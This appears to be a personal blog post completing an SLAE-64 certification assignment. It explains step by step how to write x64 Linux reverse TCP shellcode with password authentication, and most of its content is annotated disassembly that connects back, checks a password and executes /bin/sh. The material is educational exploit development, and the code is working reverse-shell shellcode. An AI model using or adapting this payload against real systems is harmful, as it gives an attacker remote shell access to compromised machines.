X64 Linux Reverse TCP Shellcode with Authentication

Jul 25, 2018 | 9 minutes read

Tags: assembly, slae-64, shellcode

This post is the second of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.

The requirements for this assignment are almost identical to Assignment 1, as such this post will follow the same format. Also, because I’m a lazy programmer (in the good way), I will be reusing certain sections of code from the first assignment.

Assignment #2 Requirements

  • Create reverse TCP shellcode
    • Connects back to configured IP and port
    • Authentication
    • If password is correct, execute the shell
  • Remove null-bytes (0x00) from the reverse TCP shellcode discussed as part of the course and
  • Compress the size of the shellcode as much as possible

General Steps to Callback

If you took a look at my first assignment, you know that it takes quite a few steps to create a bind shell. Thankfully, a reverse shell is much simpler. Those steps are as follows:

  1. socket -> Create a socket
  2. connect -> Attempt to connect to a specified address

Pick a Port and IP

For testing, I used loopback as my IP address and port 4444. We can fire up Python again to help us prep these values for use in the assembly. If you’re unfamiliar with socket programming, the function name inet_pton may sound a bit cryptic, but I’ll take this opportunity to quote the venerable Beej on the subject of inet_pton and inet_ntop

These functions (pton and ntop) are for dealing with human-readable IP addresses and converting them to their binary representation for use with various functions and system calls. The “n” stands for “network”, and “p” for “presentation”. Or “text presentation”. But you can think of it as “printable”. “ntop” is “network to printable”.

- Beej

The htons function stands for host to network short. Host to network conversion is very similar to what’s happening with the pton function. The reason we do these conversions from host byte order to network byte order is that if you’re on a little-endian machine (intel to name one), your system needs to flip information to network byte order (big-endian). Basically, a choice had to be made to determine the order in which information traversed networks. The choice was big-endian, so that necessitates flipping things around on little-endian systems before sending data on its way. Endianness is an interesting topic (especially the origin of the term), but a more thorough explanation is beyond the scope of this post.

>>> import socket

>>> hex(socket.htons(4444))

>>> socket.inet_pton(socket.AF_INET, '127.1')[::-1]

After we’ve prepped the values, they can be defined at the top of the assembly so we can easily swap them to something different later on.

%define PORTNUMBER  0x5c11
%define IPADDR      0x017f

Create a Socket

Once again, we start by creating a socket using the socket() syscall. This should look very similar to what was covered in the first assignment. One thing that changed between my first post and this one is that I found that a mov reg reg is one more opcode than push reg; pop reg. Once I complete the other assignments, I plan to revisit the earlier ones and apply the things I pick up along the way such as this.

#define __NR_socket 41

int socket(int domain, int type, int protocol);
 * rax -> 41 -> socket sycall
 * rdi -> 2 (AF_INET) -> domain
 * rsi -> 1 (SOCK_STREAM) -> type
 * rdx -> 0 -> protocol

Original shellcode: 25 bytes

0000000000400080 <_start>:
  400080:	b8 29 00 00 00       	mov    eax,0x29
  400085:	bf 02 00 00 00       	mov    edi,0x2
  40008a:	be 01 00 00 00       	mov    esi,0x1
  40008f:	ba 00 00 00 00       	mov    edx,0x0
  400094:	0f 05                	syscall
  400096:	48 89 c7             	mov    rdi,rax

My shellcode: 15 bytes

0000000000400080 <_start>:
  400080:	6a 29                	push   0x29
  400082:	58                   	pop    rax
  400083:	6a 02                	push   0x2
  400085:	5f                   	pop    rdi
  400086:	6a 01                	push   0x1
  400088:	5e                   	pop    rsi
  400089:	31 d2                	xor    edx,edx
  40008b:	0f 05                	syscall

  ; copy socket descriptor to rdi for future use
  40008d:	50                   	push   rax
  40008e:	5f                   	pop    rdi

Populate sockaddr_in Struct

To write the reverse shell, the socket needs to know about the IP and port to which we want to connect back. The sockaddr_in struct holds that information and is built using the stack since it’s too large to fit in a single register.

struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */

You may have noticed that I used 127.1 as my loopback IP. This allowed me to push something equivalent to onto the stack without any nulls. There are some other valid ways of representing IPv4 addresses such as a 32-bit integer. An example using a 32-bit integer to ping loopback is pictured below.


Original shellcode: 45 bytes

400099:	48 31 c0             	xor    rax,rax
40009c:	50                   	push   rax
40009d:	c7 44 24 fc 7f 00 00 	mov    DWORD PTR [rsp-0x4],0x100007f
4000a4:	01
4000a5:	66 c7 44 24 fa 11 5c 	mov    WORD PTR [rsp-0x6],0x5c11
4000ac:	66 c7 44 24 f8 02 00 	mov    WORD PTR [rsp-0x8],0x2
4000b3:	48 83 ec 08          	sub    rsp,0x8
4000bc:	48 89 e6             	mov    rsi,rsp

My shellcode: 23 bytes

000000000040008f <populate_sockaddr_in>:
  ; assumption: rax contains result of socket syscall, use it to
  ; zero out rdx via sign extension (cdq)
  40008f:	99                   	cdq    
  400090:	52                   	push   rdx
  400091:	52                   	push   rdx
  400092:	66 c7 44 24 04 7f 01 	mov    WORD PTR [rsp+0x4],0x17f
  400099:	66 c7 44 24 02 11 5c 	mov    WORD PTR [rsp+0x2],0x5c11
  4000a0:	c6 04 24 02          	mov    BYTE PTR [rsp],0x2
  4000a4:	54                   	push   rsp
  4000a5:	5e                   	pop    rsi

Connect (the callback)

The connect() system call connects the socket referred to by the file descriptor sockfd to the address specified by addr.

#define __NR_connect 42

int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
/* rax -> 42
 * rdi -> already contains server socket fd
 * rsi -> already contains pointer to sockaddr_in with IP:PORT
 * rdx -> length of sockaddr_in (16)

Original shellcode: 12 bytes

4000b7:	b8 2a 00 00 00       	mov    eax,0x2a
4000bf:	ba 10 00 00 00       	mov    edx,0x10
4000c4:	0f 05                	syscall

My shellcode: 8 bytes

00000000004000a6 <connect_call>:
  4000a6:	6a 2a                	push   0x2a
  4000a8:	58                   	pop    rax
  4000a9:	6a 10                	push   0x10
  4000ab:	5a                   	pop    rdx
  4000ac:	0f 05                	syscall

Read in the Password

The next few sections are almost identical to my post for the first assignment. If you’d like a more in depth analysis of the following snippets of code, please head there and take a look. The only real difference between is that I started using push reg; pop reg instead of mov reg, reg. That difference will end up making these a few bytes shorter in some cases, but for the most part they’re the same.

#define __NR_read 0

ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
 * rdi -> client already stored in rdi
 * rsi -> 24 bytes allocated should be good
 * rdx -> 24

My shellcode: 36 bytes

00000000004000ae <read_call>:
  4000ae:	31 c0                	xor    eax,eax
  4000b0:	48 83 ec 18          	sub    rsp,0x18               ; allocate space on the stack
  4000b4:	54                   	push   rsp                    
  4000b5:	5e                   	pop    rsi                    
  4000b6:	6a 18                	push   0x18
  4000b8:	5a                   	pop    rdx
  4000b9:	0f 05                	syscall                       ; <-- user input stored rsi

00000000004000bb <compare>:
  4000bb:	57                   	push   rdi    
  4000bc:	41 59                	pop    r9                     ; save server socket
  4000be:	48 b8 6c 65 74 6d 65 	movabs rax,0xa6e69656d74656c  ; letmein\n
  4000c5:	69 6e 0a
  4000c8:	48 8d 3e             	lea    rdi,[rsi]
  4000cb:	48 af                	scas   rax,QWORD PTR es:[rdi]
  4000cd:	41 51                	push   r9                     
  4000cf:	5f                   	pop    rdi                    ; restore server socket

  ; if password isn't right, close the server socket
  4000d0:	75 2e                	jne    400100 <close_call>

Duplicate File Descriptors

Just like the bind shell, now we need to duplicate the file descriptors.

#define __NR_dup2 33

int dup2(int oldfd, int newfd);
/* rax -> 33
 * rdi -> server socket
 * rsi -> 2 -> 1 -> 0 (3 iterations)

Original shellcode: 36 bytes

4000c6:	b8 21 00 00 00       	mov    eax,0x21
4000cb:	be 00 00 00 00       	mov    esi,0x0
4000d0:	0f 05                	syscall
4000d2:	b8 21 00 00 00       	mov    eax,0x21
4000d7:	be 01 00 00 00       	mov    esi,0x1
4000dc:	0f 05                	syscall
4000de:	b8 21 00 00 00       	mov    eax,0x21
4000e3:	be 02 00 00 00       	mov    esi,0x2
4000e8:	0f 05                	syscall

My shellcode: 20 bytes

00000000004000d2 <dup2_calls>:
  4000d2:	6a 03                	push   0x3
  4000d4:	59                   	pop    rcx                    ; loop counter
  4000d5:	6a 02                	push   0x2
  4000d7:	5b                   	pop    rbx                    ; used as file desciptor

00000000004000d8 <dup2_loop>:
  4000d8:	6a 21                	push   0x21
  4000da:	58                   	pop    rax
  4000db:	89 de                	mov    esi,ebx                ; 2 -> 1 -> 0
  4000dd:	51                   	push   rcx                    ; store loop counter
  4000de:	0f 05                	syscall
  4000e0:	59                   	pop    rcx                    ; restore loop counter
  4000e1:	48 ff cb             	dec    rbx
  4000e4:	e2 f2                	loop   4000d8 <dup2_loop>

Exec /bin/sh

Finally, it’s time to execve() our shell. Once again, the only appreciable difference from this snippet and the corresponding section from the first assignment is the use of a different method of moving data between two registers. Also, included here is the label that marks where to jump when the user provides an incorrect password.

#define __NR_execve 59

int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
 * rdi -> "/bin//sh", 0x0
 * rsi -> [addr of bin/sh], 0x0
 * rdx -> 0x0

#define __NR_close 3

int close(int fd);
/* rax -> 3
 * rdi -> fd already stored in rdi

Original shellcode: 32 bytes

4000ea:	48 31 c0             	xor    rax,rax
4000ed:	50                   	push   rax
4000ee:	48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
4000f5:	2f 73 68
4000f8:	53                   	push   rbx
4000f9:	48 89 e7             	mov    rdi,rsp
4000fc:	50                   	push   rax
4000fd:	48 89 e2             	mov    rdx,rsp
400100:	57                   	push   rdi
400101:	48 89 e6             	mov    rsi,rsp
400104:	48 83 c0 3b          	add    rax,0x3b
400108:	0f 05                	syscall

My shellcode: 31 bytes

00000000004000e6 <exec_call>:
  4000e6:	31 d2                	xor    edx,edx
  4000e8:	52                   	push   rdx
  4000e9:	48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
  4000f0:	2f 73 68
  4000f3:	53                   	push   rbx
  4000f4:	54                   	push   rsp
  4000f5:	5f                   	pop    rdi
  4000f6:	52                   	push   rdx
  4000f7:	57                   	push   rdi
  4000f8:	54                   	push   rsp
  4000f9:	5e                   	pop    rsi
  4000fa:	48 8d 42 3b          	lea    rax,[rdx+0x3b]
  4000fe:	0f 05                	syscall
0000000000400100 <close_call>:
  400100:	6a 03                	push   0x3
  400102:	58                   	pop    rax
  400103:	0f 05                	syscall

The end… for now

Here we have a functional password protected reverse shell. There are no nulls in the code and even after adding authentication, my shellcode ended up a tad smaller than the original (barely).

  • Original shellcode: 138 bytes
  • My shellcode: 133 bytes

I’m looking forward to the egghunter assignment that is coming up next!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: E64-1584
My SLAE-64 Assignments Repository

comments powered by Disqus